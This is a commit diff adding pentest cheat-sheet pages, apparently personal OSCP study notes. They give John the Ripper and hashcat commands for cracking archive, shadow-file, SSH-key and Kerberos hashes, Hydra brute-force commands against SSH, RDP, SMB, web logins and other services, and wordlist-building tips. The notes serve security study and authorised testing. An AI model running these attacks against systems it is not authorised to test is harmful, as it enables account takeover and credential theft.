content-update

docs/Password Attacks, Cracking & Decoding/Cracking Files.md

@@ -1 +1,87 @@
-Test
+
+[Offensive Security Cheatsheet](https://cheatsheet.haax.fr/passcracking-hashfiles/cracking_files/)
+
+
+## Cracking archives
+
+#### RAR
+```shell
+rar2john file.rar > rar_hashes.txt
+john --wordlist=passwords.txt rar_hashes.txt
+```
+
+#### ZIP
+```shell
+zip2john file.rar > zip_hashes.txt
+john --wordlist=passwords.txt zip_hashes.txt
+```
+
+#### ZIP Using fcrackzip
+```shell
+fcrackzip -u -D -p rockyou.txt recup.zip
+```
+
+## Cracking shadow files 
+
+#### unshadow
+```shell
+unshadow passwd shadow > shadowjohn.txt
+john --wordlist=/home/user/Desktop/Certifs/OSCP/Tools/Wordlist/Bruteforce/rockyou.txt --rules shadowjohn.txt
+john --show shadowjohn.txt
+```
+
+#### Hashcat SHA512 $6$ shadow file  
+```shell
+hashcat -m 1800 -a 0 hash.txt rockyou.txt --username
+```
+
+#### Hashcat MD5 $1$ shadow file  
+```shell
+hashcat -m 500 -a 0 hash.txt rockyou.txt --username
+```
+
+
+## Various cracking techniques 
+
+#### Hashcat MD5 Apache webdav file  
+```shell
+hashcat -m 1600 -a 0 hash.txt rockyou.txt
+```
+
+#### Hashcat SHA1  
+```shell
+hashcat -m 100 -a 0 hash.txt rockyou.txt --force
+```
+
+#### Hashcat Wordpress  
+```shell
+hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
+```
+
+#### SSH Key
+```shell
+ssh2john id_rsa  > sshtocrack
+john --wordlist=/usr/share/wordlists/rockyou.txt sshtocrack
+```
+
+#### Cracking Cisco passwords
+Type 5 → MD5
+Type 7 → Easy reversible
+```shell
+hashcat -m 500 c:\temp\ciscohash.txt C:\DICS\english-dic.txt
+```
+
+#### Cracking NTLVMv2 hashes
+```shell
+john --format=netntlmv2 --wordlist="/usr/share/wordlists/rockyou.txt" hash.txt 
+```
+------------------------------------------------------
+
+## Cracking TGS 
+
+#### Using John from bleeding repo
+```shell
+Go here /home/user/Desktop/Certifs/OSCP/Tools/PasswordCracking/JohnTheRipper/run
+
+./john --wordlist=/home/user/Desktop/Certifs/OSCP/Tools/Wordlist/Bruteforce/rockyou.txt --fork=4 --format=krb5tgs /home/user/Desktop/HackTheBox/VM/Active/kerberos_hashes.txt
+```

docs/Password Attacks, Cracking & Decoding/Hydra.md

@@ -1 +1,126 @@
-Test
+## Hydra
+
+#### Hydra GUI
+[xhydra](https://www.kali.org/tools/hydra/#hydra-gtk)
+```bash
+sudo apt install hydra-gtk
+```
+
+
+#### RDP
+```shell
+hydra -V -f -L usernames.txt -P passwords.txt rdp://10.0.2.5 -V
+hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip	
+```
+
+#### SSH
+```shell
+hydra -l root -P passwords.txt -f ssh://10.0.2.5 -V
+hydra $ip -s 22 ssh -l -P big_wordlist.txt
+hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
+hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh
+```
+
+#### SMB
+```shell
+hydra -l Administrator -P passwords.txt -f smb://10.0.2.5 -V
+hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb	
+hydra -L usernames.txt -P passwords.txt $ip smb -V -f	
+```
+
+#### FTP
+```shell
+hydra -l root -P passwords.txt -f smb://10.0.2.5 -V
+```
+
+#### HTTP Basic Auth
+```shell
+hydra -L users.txt -P password.txt 10.0.2.5 http-get /login/ -V
+Http get 401 login with a dictionary
+hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
+```
+
+#### HTTP Post
+```shell
+hydra -L users.txt -P password.txt 10.0.2.5 http-post-form
+"/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login
+name or password is incorrect" -V
+
+hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.216.57 http-post-form "/Account/login.aspx:__VIEWSTATE=AmInWQjOL%2BAHMc9qQ0CW0CFnlUXaqoRXEj%2FOvBixV%2Fld9p%2BKj%2B7mB%2FZ7FcrOxWmCkIjSfD9utiaSxAvSBmKz1VkaDvYW9b5sxJWoX3ZOskfQg0u3CsSjndshwiuLcEq7l%2BRc7FwwBs%2BvLvrnXfcLFt%2B0vNv1zwwLa3QoTUjG3V9hk0Sg&__EVENTVALIDATION=zMZzvwm4lfkTglvBFfLhbEjJu8yEheigLkmHJ7E8owtV2FVK0TTZdne0RExmMdPY5RORs4UuLmymoBfQmY8UwKaRwaqnpZkAM%2BPLgxPNj3wtiiTaC4jbJSUoKPCRWBtpMIz4vtdxr9zbhDPn5zB7IJSOpA%2FMzo6LYD9oiiaMKWUj8VNM&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
+```
+
+#### IMAP
+```shell
+hydra -l root -P passwords.txt -f imap://10.0.2.5 -V
+```
+
+#### MySQL
+```shell
+hydra -L usernames.txt -P pass.txt -f mysql://10.0.2.5 -V
+```
+
+#### POP
+```shell
+hydra -l USERNAME -P passwords.txt -f pop3://10.0.2.5 -V
+hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V	
+```
+
+#### Redis
+```shell
+hydra –P password.txt redis://10.0.2.5 -V
+```
+
+#### Rexec
+```shell
+hydra -l root -P password.txt rexec://10.0.2.5 -V
+```
+
+#### Rlogin
+```shell
+hydra -l root -P password.txt rlogin://10.0.2.5 -V
+```
+
+#### RSH
+```shell
+hydra -L username.txt rsh://10.0.2.5 -V
+```
+
+#### RSP
+```shell
+hydra -l root -P passwords.txt <IP> rtsp
+```
+
+#### SNMP
+```shell
+hydra -P password-file.txt -v $ip snmp
+```
+
+#### SMTP
+```shell
+hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
+hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
+hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V
+#Port 587 for SMTP with SSL
+```
+
+#### Telnet
+```shell
+hydra -l root -P passwords.txt [-t 32] <IP> telnet
+```
+
+#### VNC
+```shell
+hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT>
+<IP> vnc
+```
+
+#### Wordpress
+```shell
+hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'	
+```
+
+#### LDAP
+```shell
+hydra -L users.txt -P passwords.txt $ip ldap2 -V -f	
+```
+

docs/Password Attacks, Cracking & Decoding/Wordlists.md

@@ -1,30 +1,27 @@
-
-> [!NOTE] Resources
-
+#### Wordlists references
 [Kaonashi](https://github.com/kaonashi-passwords/Kaonashi)
 [richelieu](https://github.com/tarraschk/richelieu)
 [rockyou](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt)
 [packetstormsecurity](https://packetstormsecurity.com/Crackers/wordlists/page4/)
 [gwicks dictionaries](http://www.gwicks.net/dictionaries.htm)
-
-SCADA Default Passwords
+[FlameOfIgnis](https://github.com/FlameOfIgnis/Pwdb-Public)
 [critifence](http://www.critifence.com/default-password-database/)
 [weakpass](https://weakpass.com/)
 [berzerk0](https://github.com/berzerk0/Probable-Wordlists)
 
-Looks very cool wordlists
-[FlameOfIgnis](https://github.com/FlameOfIgnis/Pwdb-Public)
 
+#### seclist
 
 ```shell title:"Wordlists"
 sudo apt-get install seclists
 ls /usr/share/wordlists
-----------------------------------------------------------------------------------
-#CeWL 
-# CeWL allows you to build custom wordlists based on online resources
-# If you know that your target is target.com, you can parse web content to build lists
-# Can be time consuming
+```
 
+
+#### CeWL 
+CeWL allows you to build custom wordlists based on online resources. If you know that your target is target.com, you can parse web content to build lists. Can be time consuming.
+
+```bash
 # 5 levels of depth and minimum 7 char per word
 cewl -w customwordlist.txt -d 5 -m 7 www.sans.org
 
@@ -33,21 +30,19 @@ cewl -w customwordlist.txt -d 5 -m 7 -o www.sans.org
 
 # Include e-mail adresses
 cewl -w customwordlist.txt -d 5 -m 7 -e www.sans.org
+```
 
-----------------------------------------------------------------------------------
-PACK 
-# Password Analysis and Cracking Kit 
-# You can get stats about already cracked passwords
-# In order to define new masks
-https://github.com/iphelix/pack
+#### PACK
+Password Analysis and Cracking Kit. You can get stats about already cracked passwords, In order to define new masks https://github.com/iphelix/pack
 
+```bash
 python statsgen.py rockyou.txt
+```
+
+#### Combinator
+Combinator is part of the hashcat-utils. It can be used to prepare a combinated wordlist for cracking. It allows then to combination + others settings like masks or rules.
 
-----------------------------------------------------------------------------------
-Combinator 
-# Combinator is part of the hashcat-utils
-# It can be used to prepare a combinated wordlist for cracking
-# It allows then to combination + others settings like masks or rules
+```bash
 combinator.exe file1 file2
 
 # It can create MASSIVE wordlists and take some time to run.
@@ -59,4 +54,3 @@ combinator2.exe file1 file2 file3
 combinator.exe file1 file2 | hashcat -m x hashs.file -a 0 --force -O
 
 ```
-